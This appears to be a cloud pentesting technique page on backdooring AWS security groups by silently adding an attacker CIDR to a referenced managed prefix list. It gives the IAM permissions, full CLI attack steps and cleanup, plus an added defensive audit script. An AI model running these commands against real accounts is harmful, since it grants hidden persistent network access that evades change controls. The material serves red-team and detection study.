AWS - Security Group Backdoor via Managed Prefix Lists


Summary

Abuse customer-managed Prefix Lists to create a hidden entry path. If a security group (SG) rule references a managed Prefix List, anyone able to modify that list can silently add attacker-controlled CIDRs. Every SG (and potentially any Network ACL or VPC endpoint policy) that references the list immediately accepts the new IP ranges, with no visible change on the SG itself.

Impact

  • Instant expansion of the allowed IP ranges for every SG that references the prefix list, bypassing change controls that only monitor edits to the SG.
  • Enables a persistent ingress/egress backdoor: a malicious CIDR sits hidden inside the prefix list while the SG rule appears unchanged.

Requirements

  • IAM permissions:
    • ec2:DescribeManagedPrefixLists
    • ec2:GetManagedPrefixListEntries
    • ec2:ModifyManagedPrefixList
    • ec2:DescribeSecurityGroups / ec2:DescribeSecurityGroupRules (to identify the SGs that reference the list)
    • Optional: ec2:CreateManagedPrefixList if creating a new list for testing.
  • Environment: at least one SG rule that references the target customer-managed Prefix List.

Variables

```bash
REGION=us-east-1
PREFIX_LIST_ID=<pl-xxxxxxxx>
ENTRY_CIDR=<attacker-cidr/32>
DESCRIPTION="Backdoor – allow attacker"
```

Attack steps

  1. Enumerate candidate prefix lists and their consumers

```bash
aws ec2 describe-managed-prefix-lists \
--region "$REGION" \
--query 'PrefixLists[?OwnerId==`<victim-account-id>`].[PrefixListId,PrefixListName,State,MaxEntries]' \
--output table

aws ec2 get-managed-prefix-list-entries \
--prefix-list-id "$PREFIX_LIST_ID" \
--region "$REGION" \
--query 'Entries[*].[Cidr,Description]'
```

Use `aws ec2 describe-security-group-rules --filters Name=referenced-prefix-list-id,Values=$PREFIX_LIST_ID` to confirm which SG rules depend on the list.

  2. Add the attacker CIDR to the prefix list

```bash
aws ec2 modify-managed-prefix-list \
--prefix-list-id "$PREFIX_LIST_ID" \
--add-entries Cidr="$ENTRY_CIDR",Description="$DESCRIPTION" \
--region "$REGION"
```

  3. Verify propagation to the security groups

```bash
aws ec2 describe-security-group-rules \
--region "$REGION" \
--filters Name=referenced-prefix-list-id,Values="$PREFIX_LIST_ID" \
--query 'SecurityGroupRules[*].{SG:GroupId,Description:Description}' \
--output table
```

Traffic from $ENTRY_CIDR is now allowed everywhere the prefix list is referenced (typically outbound rules on egress proxies or inbound rules on shared services).

Evidence

  • get-managed-prefix-list-entries shows the attacker's CIDR and description.
  • describe-security-group-rules still shows the original SG rule referencing the prefix list (no SG modification is reported), yet traffic from the new CIDR succeeds.
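Because the SG rule itself never changes, detection has to look at the prefix list entries (and the CloudTrail ModifyManagedPrefixList events) rather than at SG edits. The following added audit script is not from the original page: it takes the JSON output of the two CLI calls above, diffs the list's entries against an approved baseline, and maps every SG rule that references the list, so a drifted entry can be tied to the exact groups and ports it now reaches. All ids and CIDRs in it are constructed sample data.

```python
import json
from ipaddress import ip_network

# Constructed sample of `aws ec2 get-managed-prefix-list-entries` output
# (pl-/sg- ids and CIDRs are made up for this example).
ENTRIES_JSON = """{"Entries": [
  {"Cidr": "10.20.0.0/16",   "Description": "corp-vpn"},
  {"Cidr": "203.0.113.7/32", "Description": "Backdoor - allow attacker"}
]}"""

# Constructed sample of `aws ec2 describe-security-group-rules
#   --filters Name=referenced-prefix-list-id,Values=pl-0abc1234` output.
SG_RULES_JSON = """{"SecurityGroupRules": [
  {"SecurityGroupRuleId": "sgr-1", "GroupId": "sg-0aaa", "IsEgress": false,
   "IpProtocol": "tcp", "FromPort": 443, "ToPort": 443, "PrefixListId": "pl-0abc1234"},
  {"SecurityGroupRuleId": "sgr-2", "GroupId": "sg-0bbb", "IsEgress": true,
   "IpProtocol": "-1", "FromPort": -1, "ToPort": -1, "PrefixListId": "pl-0abc1234"}
]}"""

# Approved entries, e.g. exported from change control when the list was created.
BASELINE = ["10.20.0.0/16"]


def unapproved_entries(entries_json, baseline):
    """Return prefix-list CIDRs not contained in any approved baseline CIDR."""
    approved = [ip_network(c) for c in baseline]
    bad = []
    for entry in json.loads(entries_json)["Entries"]:
        net = ip_network(entry["Cidr"])
        # subnet_of() only compares same-family networks, so guard on version.
        if not any(net.version == a.version and net.subnet_of(a) for a in approved):
            bad.append(entry["Cidr"])
    return bad


def exposed_rules(sg_rules_json, prefix_list_id):
    """Map each SG rule referencing the list to (group, direction, proto, from, to)."""
    out = []
    for r in json.loads(sg_rules_json)["SecurityGroupRules"]:
        if r.get("PrefixListId") != prefix_list_id:
            continue
        direction = "egress" if r["IsEgress"] else "ingress"
        out.append((r["GroupId"], direction, r["IpProtocol"], r["FromPort"], r["ToPort"]))
    return out


def audit(entries_json, sg_rules_json, prefix_list_id, baseline):
    """Combine both views: every unapproved entry is reachable through every listed rule."""
    return {"unapproved": unapproved_entries(entries_json, baseline),
            "rules": exposed_rules(sg_rules_json, prefix_list_id)}


if __name__ == "__main__":
    print(json.dumps(audit(ENTRIES_JSON, SG_RULES_JSON, "pl-0abc1234", BASELINE), indent=2))
```

Feed it the real CLI output for each customer-managed list and alert whenever `unapproved` is non-empty; the `rules` list tells you which groups to review first.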

Cleanup

```bash
aws ec2 modify-managed-prefix-list \
--prefix-list-id "$PREFIX_LIST_ID" \
--remove-entries Cidr="$ENTRY_CIDR" \
--region "$REGION"
```
